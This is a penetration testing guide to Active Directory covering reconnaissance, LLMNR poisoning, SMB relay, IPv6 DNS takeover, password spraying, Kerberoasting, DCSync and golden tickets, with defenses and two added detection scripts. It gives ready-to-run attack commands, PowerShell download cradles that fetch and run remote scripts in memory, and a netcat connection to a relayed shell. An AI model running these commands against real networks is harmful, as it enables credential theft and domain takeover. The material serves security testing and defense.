Active Directory Penetration Testing Guide

Active Directory Overview

Active Directory is a directory service developed by Microsoft to manage Windows domain networks. It stores information about objects such as computers, users, printers, etc. Think of it as a phone book for Windows. Domain members authenticate with Kerberos tickets, and non-Windows devices such as Linux machines and firewalls can also authenticate against it via RADIUS or LDAP.

Why Active Directory Pentest?

  • Active Directory is the most commonly used identity management service in the world
  • 95% of Fortune 1000 companies implement it in their networks
  • Can be exploited without relying on patchable vulnerabilities
  • Instead, we abuse features, trusts, components, and more

Physical Components

Domain Controllers

  • A server with the AD DS server role installed that has been promoted to a domain controller
  • Hosts a copy of the AD DS directory store
  • Provides authentication and authorization services
  • Replicates updates to other domain controllers in the domain and forest
  • Allows administrative access to manage user accounts and network resources

AD DS Data Store

  • Contains database files and processes that store directory information for users, services, and applications
  • Consists of the Ntds.dit file
  • Stored by default in %SystemRoot%\NTDS folder on all domain controllers

Logical AD Components

AD DS Schema

Defines every type of object that can be stored in the directory and enforces rules regarding object creation and configuration.

Domains, Trees, Forests & OUs

  • Domains: Used to group and manage objects in an organization
  • Trees: A hierarchy of domains in AD DS — all share a contiguous namespace and by default create two-way transitive trusts
  • Forests: A collection of one or more domain trees sharing a common configuration partition, global catalog, and the Enterprise Admins/Schema Admins groups
  • OUs: Containers that hold users, groups, computers, and other OUs for hierarchical management and policy application

Trusts

  • Directional: Trust direction flows from trusting domain to trusted domain
  • Transitive: Extended beyond a two-domain trust to include other trusted domains

Active Directory Reconnaissance

Host Discovery

nmap -sn -v 192.168.10.0/24 -oA host_discovery_scan.txt

Full Port Scan

nmap -p- --min-rate 10000 -oA all_port_scan.txt 192.168.10.5

AD-specific Port Scan

nmap -T4 -sCV -p 139,445,389,88,53,636 -oA ad_port_scan.txt 192.168.10.5

Network Mapping with nxc

nxc smb 192.168.10.0/24

Note: CrackMapExec (cme) is no longer maintained. Use nxc (NetExec) instead.


Initial Attack Vectors

LLMNR Poisoning

LLMNR is used to identify hosts when DNS resolution fails. The key flaw is that a host accepts whatever answer it receives: if an attacker responds to the broadcast query, the requesting host authenticates to the attacker and hands over the user's username together with an NTLMv1/NTLMv2 challenge-response hash.

Exploitation:

# Step 1: Run Responder
sudo responder -I eth0 -dw

# Step 2: Wait for an event (failed DNS resolution, a mistyped hostname)
# Step 3: Capture NTLMv1/NTLMv2 hashes

# Step 4: Crack with hashcat (NTLMv2 = mode 5600, NTLMv1 = mode 5500)
hashcat -m <hash_mode> hashes.txt rockyou.txt

Defense:

  • Disable LLMNR via Group Policy: Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client > Turn OFF Multicast Name Resolution
  • Disable NBT-NS: Network Adapter Properties > TCP/IPv4 > Advanced > WINS > Disable NetBIOS over TCP/IP
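Verifying that the two GPO settings above actually took effect on every client is tedious; a cheaper network-side check is a canary query. A legitimate host only answers LLMNR for its own name, so a query for a name nobody owns gets no reply on a healthy segment, while a poisoner answers everything. The following probe is an added example written for this page, not code from the original post or from any tool it mentions; the canary hostname and the 2-second wait are assumptions, and the only reply parsed is an A record.

```python
"""Added example (not from the original post): an LLMNR poisoner canary probe.

A query for a deliberately bogus name should get no LLMNR reply on a clean
segment; any reply pinpoints a host that is spoofing responses. Run it from an
ordinary client subnet; it needs no privileges beyond sending UDP.
"""
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # RFC 4795 link-local multicast group
LLMNR_PORT = 5355


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Build an LLMNR A-record query; the wire format mirrors a DNS query."""
    # header: ID, flags=0 (standard query), QDCOUNT=1, ANCOUNT=NSCOUNT=ARCOUNT=0
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split(".")) + b"\x00"
    question = qname + struct.pack("!HH", 1, 1)       # QTYPE=A, QCLASS=IN
    return header + question


def _skip_name(buf: bytes, off: int) -> int:
    """Return the offset just past a (possibly compressed) name starting at off."""
    while True:
        length = buf[off]
        if length == 0:
            return off + 1
        if (length & 0xC0) == 0xC0:        # compression pointer: 2 bytes, ends the name
            return off + 2
        off += 1 + length


def parse_llmnr_answers(buf: bytes, expected_txid: int) -> list:
    """Return the A-record addresses in an LLMNR response for expected_txid."""
    if len(buf) < 12:
        return []
    txid, flags, qd, an, _ns, _ar = struct.unpack_from("!HHHHHH", buf, 0)
    if txid != expected_txid or not (flags & 0x8000):   # QR bit marks a response
        return []
    off = 12
    for _ in range(qd):                      # skip the echoed question(s)
        off = _skip_name(buf, off) + 4       # + QTYPE + QCLASS
    addrs = []
    for _ in range(an):
        off = _skip_name(buf, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", buf, off)
        off += 10
        if rtype == 1 and rdlen == 4:        # A record
            addrs.append(socket.inet_ntoa(buf[off:off + 4]))
        off += rdlen
    return addrs


def probe_for_poisoner(bogus_name: str = "canary-host-does-not-exist",
                       timeout: float = 2.0) -> list:
    """Send one LLMNR query for a name nobody owns and collect every reply.
    Returns [(replying_ip, [addresses it claimed]), ...]; empty means clean."""
    txid = random.randint(0, 0xFFFF)
    query = build_llmnr_query(bogus_name, txid)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
        sock.settimeout(timeout)
        sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                data, (src, _port) = sock.recvfrom(512)
                addrs = parse_llmnr_answers(data, txid)
                if addrs:
                    hits.append((src, addrs))
        except socket.timeout:
            pass
    return hits


if __name__ == "__main__":
    found = probe_for_poisoner()
    if not found:
        print("no LLMNR responder answered the canary query")
    for src, addrs in found:
        print(f"ALERT: {src} answered LLMNR for a bogus name, claiming {addrs}")
```

The probe only covers LLMNR (UDP 5355); NBT-NS poisoning uses a different protocol on UDP 137 and needs a separate check. Scheduling this from a few client VLANs gives an early warning that the Group Policy settings above are missing somewhere or that a poisoner is live.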

SMB Relay

Instead of cracking hashes from Responder, relay them to specific machines and gain local admin access.

Prerequisites:

  • SMB signing disabled on target
  • Captured user is a local admin on multiple machines

Exploitation:

# Step 1: Find hosts where SMB signing is not required
nmap --script=smb2-security-mode.nse -p 445 192.168.10.0/24
nxc smb 192.168.10.0/24

# Step 2: Edit Responder.conf and set SMB = Off and HTTP = Off so that
#         Responder leaves those protocols to ntlmrelayx
# Step 3: Run Responder
sudo responder -I eth0 -dw

# Step 4: Run ntlmrelayx against the hosts found in Step 1
impacket-ntlmrelayx -tf targets.txt -smb2support

# Step 5: Ask for an interactive SMB shell instead of the default SAM dump
impacket-ntlmrelayx -tf targets.txt -smb2support -i

# Step 6: Connect with netcat to the address and port that ntlmrelayx prints
nc 192.168.10.1 1337

Defense: Enable SMB Signing on all devices, disable NTLM authentication, enforce account tiering, restrict local admin accounts.


IPv6 DNS Takeover

IPv6 is enabled by default on Windows but usually goes unused, so nothing on the network answers DHCPv6 requests. An attacker who does answer them (mitm6) becomes the clients' DNS server, intercepts their name lookups, and relays the resulting authentication to the Domain Controller via LDAP or SMB.

Exploitation:

# Run mitm6 to answer DHCPv6 and become the DNS server for the domain's clients
mitm6 -d pentest.local

# Run ntlmrelayx (in another terminal), relaying over IPv6 to the DC's LDAPS service
impacket-ntlmrelayx -6 -t ldaps://<dc_ip> -wh fakewpad.pentest.local -l output_directory

Defense: Block DHCPv6 traffic and incoming router advertisements via Windows Firewall Group Policy. Enable LDAP signing and LDAP channel binding.


Password Spraying

Most initial footholds into AD environments come through password spray. Curate a wordlist based on the organization name:

# Enumerate users via SMB null session (empty username and password)
nxc smb <dc_ip> -u '' -p '' --users

# Enumerate via the guest account (an unknown user falls back to guest when it is enabled)
nxc smb <dc_ip> -u 'aaa' -p 'aaa' --users

# Password spray one candidate password across the user list
nxc smb <dc_ip> -u users_list.txt -p 'Orgname@1234' | tee out.txt

# Spray the local Administrator account across a range
nxc smb <ip_range> -u Administrator -p 'Orgname@1234' --local-auth | tee out.txt

# Check WinRM access
nxc winrm <ip_address> -u 'john.cena' -p 'Orgname@1234'

# Connect via Evil-WinRM
evil-winrm -i <ip_address> -u 'john.cena' -p 'Orgname@1234'
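Because a spray touches many accounts once each, it looks different in the Security log from a brute force that hammers one account, and that difference is what a detection should key on. The script below is an added example for this page, not code from the original post: it counts distinct target accounts per source address inside a sliding window over event 4625 records. The JSON-lines export format and the field names (`TargetUserName`, `IpAddress`, `Status`) are assumptions that follow the Security log's EventData names, and the sample events are constructed.

```python
"""Added example (not part of the original post): password-spray detection
over Windows Security event 4625 (logon failure) records.

A spray is many DIFFERENT usernames failing from one source inside a short
window, usually once each; a brute force is one username failing many times.
Counting distinct users per source separates the two.
"""
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# NTSTATUS values commonly seen in the 4625 Status/SubStatus fields
STATUS_NAMES = {
    "0xC000006A": "wrong password",
    "0xC0000064": "user does not exist",
    "0xC0000234": "account locked out",
}

# Constructed sample (JSON lines; field names follow the Security log's
# EventData). 192.168.10.77 sprays six accounts in six seconds;
# 192.168.10.50 hammers one account, which is a brute force, not a spray.
SAMPLE_4625 = """
{"EventID":4625,"TimeCreated":"2024-05-01T09:00:01","TargetUserName":"john.cena","IpAddress":"192.168.10.77","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:00:02","TargetUserName":"randy.orton","IpAddress":"192.168.10.77","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:00:03","TargetUserName":"svc_backup","IpAddress":"192.168.10.77","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:00:04","TargetUserName":"hhh","IpAddress":"192.168.10.77","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:00:05","TargetUserName":"undertaker","IpAddress":"192.168.10.77","Status":"0xC0000064"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:00:06","TargetUserName":"kane","IpAddress":"192.168.10.77","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:01:00","TargetUserName":"john.cena","IpAddress":"192.168.10.50","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:01:05","TargetUserName":"john.cena","IpAddress":"192.168.10.50","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:01:10","TargetUserName":"john.cena","IpAddress":"192.168.10.50","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:01:15","TargetUserName":"john.cena","IpAddress":"192.168.10.50","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T09:01:20","TargetUserName":"john.cena","IpAddress":"192.168.10.50","Status":"0xC000006A"}
{"EventID":4625,"TimeCreated":"2024-05-01T14:30:00","TargetUserName":"kane","IpAddress":"192.168.10.77","Status":"0xC000006A"}
""".strip()


def parse_events(lines):
    """Yield event dicts from JSON lines, with TimeCreated parsed to a datetime."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["TimeCreated"] = datetime.fromisoformat(ev["TimeCreated"])
        yield ev


def detect_spray(lines, window=timedelta(minutes=5), min_users=5):
    """Return one alert per source IP whose 4625 failures cover at least
    min_users distinct accounts within some sliding window of length `window`.
    The alert reports the densest window seen for that source."""
    per_source = defaultdict(list)
    for ev in parse_events(lines):
        if ev.get("EventID") == 4625:
            per_source[ev["IpAddress"]].append(ev)

    alerts = []
    for src, evs in per_source.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        in_window = Counter()        # username -> hits inside the current window
        start = 0
        best = None
        for end, ev in enumerate(evs):
            in_window[ev["TargetUserName"]] += 1
            # slide the left edge forward until the window fits
            while ev["TimeCreated"] - evs[start]["TimeCreated"] > window:
                old = evs[start]["TargetUserName"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            distinct = len(in_window)
            if distinct >= min_users and (best is None or distinct > best["distinct_users"]):
                breakdown = Counter(e["Status"] for e in evs[start:end + 1])
                best = {
                    "source": src,
                    "distinct_users": distinct,
                    "window_start": evs[start]["TimeCreated"].isoformat(),
                    "window_end": ev["TimeCreated"].isoformat(),
                    "status_breakdown": {STATUS_NAMES.get(s, s): n for s, n in breakdown.items()},
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_4625.splitlines()):
        print(f"SPRAY from {a['source']}: {a['distinct_users']} accounts between "
              f"{a['window_start']} and {a['window_end']} {a['status_breakdown']}")
```

Event 4625 is written on the host that rejected the logon; when the spray goes through NTLM against the domain (as the nxc command above does), the DC records 4776 and for Kerberos pre-authentication failures 4771, so a production rule should apply the same per-source distinct-user logic to those IDs as well. The `user does not exist` count in the breakdown is a useful secondary signal, since a sprayed list built from enumeration often contains stale accounts.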

CVE Checks

Old-but-gold CVEs like ZeroLogon, EternalBlue, etc. can lead to quick wins. Run a Nessus scan on the in-scope IP range to identify them.


Post-Compromise Enumeration

Bypass PowerShell Security with InvisiShell

# Download cradle: fetch a script over HTTP(S) and run it in memory without touching disk
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

PowerView Enumeration

# Load PowerView
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1')

# Domain info
Get-Domain
Get-DomainSID
Get-DomainController
(Get-DomainPolicyData).systemaccess

# Users & Groups
Get-DomainUser
Get-DomainUser -Identity john.cena -Properties *
Get-DomainGroup | select Name
Get-DomainGroup *admin*
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Computers
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "Server 2022"

# Active sessions
Get-NetLoggedon -ComputerName johncena-dc
Get-LoggedonLocal -ComputerName johncena-dc
Get-LastLoggedOn -ComputerName dcorp-adminsrv

# Shares
Invoke-ShareFinder -Verbose
Invoke-FileFinder -Verbose
Get-NetFileServer

BloodHound

powershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName out.zip

Post-Compromise Attacks

Pass the Hash / Pass the Password

# Pass the password
nxc smb <ip_range> -u 'john.cena' -p 'johncena@123'

# Pass the hash
nxc smb <ip_range> -u 'john.cena' -H <ntlm_hash>

# Local auth variants
nxc smb <ip_range> -u 'john.cena' -p 'johncena@123' --local-auth
nxc smb <ip_range> -u 'john.cena' -H <ntlm_hash> --local-auth

GPP / cPassword Attack (MS14-025)

Group Policy Preferences allowed admins to embed credentials in policy files (the cPassword attribute) encrypted with a static AES key that Microsoft itself published, so anyone who can read SYSVOL can decrypt them. Patched in MS14-025, but legacy deployments still exist.

gpp-decrypt <cpassword_value>

Kerberoasting

Request TGS tickets for accounts that have an SPN; each ticket is encrypted with that service account's password hash, so the service account's password can be cracked offline without touching the account again.

# Request TGS tickets for every account with an SPN and write them in hashcat format
impacket-GetUserSPNs -dc-ip <dc_ip> <DOMAIN>/<username>:<password> -request -outputfile kerberoast.txt

# Crack with hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23)
hashcat -m 13100 kerberoast.txt rockyou.txt

DC-Sync Attack

Simulate a Domain Controller and retrieve password data via domain replication — without code execution on the DC.

impacket-secretsdump <domain>/<username>:<password>@<ip_address>

Persistence

Golden Ticket Attack

A Golden Ticket is signed and encrypted using the krbtgt account hash, making it a valid TGT that can impersonate any user from any machine — even non-domain joined.

Best practice: after detecting a compromise, reset the krbtgt password twice, letting replication complete between the two resets. The previous password is kept for password history, so tickets forged with the old key stay valid until the second reset pushes it out.

impacket-ticketer -nthash b18b4b218eccad1c223306ea1916885f \
  -domain-sid S-1-5-21-1339291983-1349129144-367733775 \
  -domain wwe.local -dc-ip 10.10.10.1 Administrator

With the modern EDR/XDR era, Active Directory exploitation is becoming more challenging — and more fun. The above techniques are a solid starting point for any seasoned pentester who loves to pwn Active Directory environments.

This post is licensed under CC BY 4.0 by the author.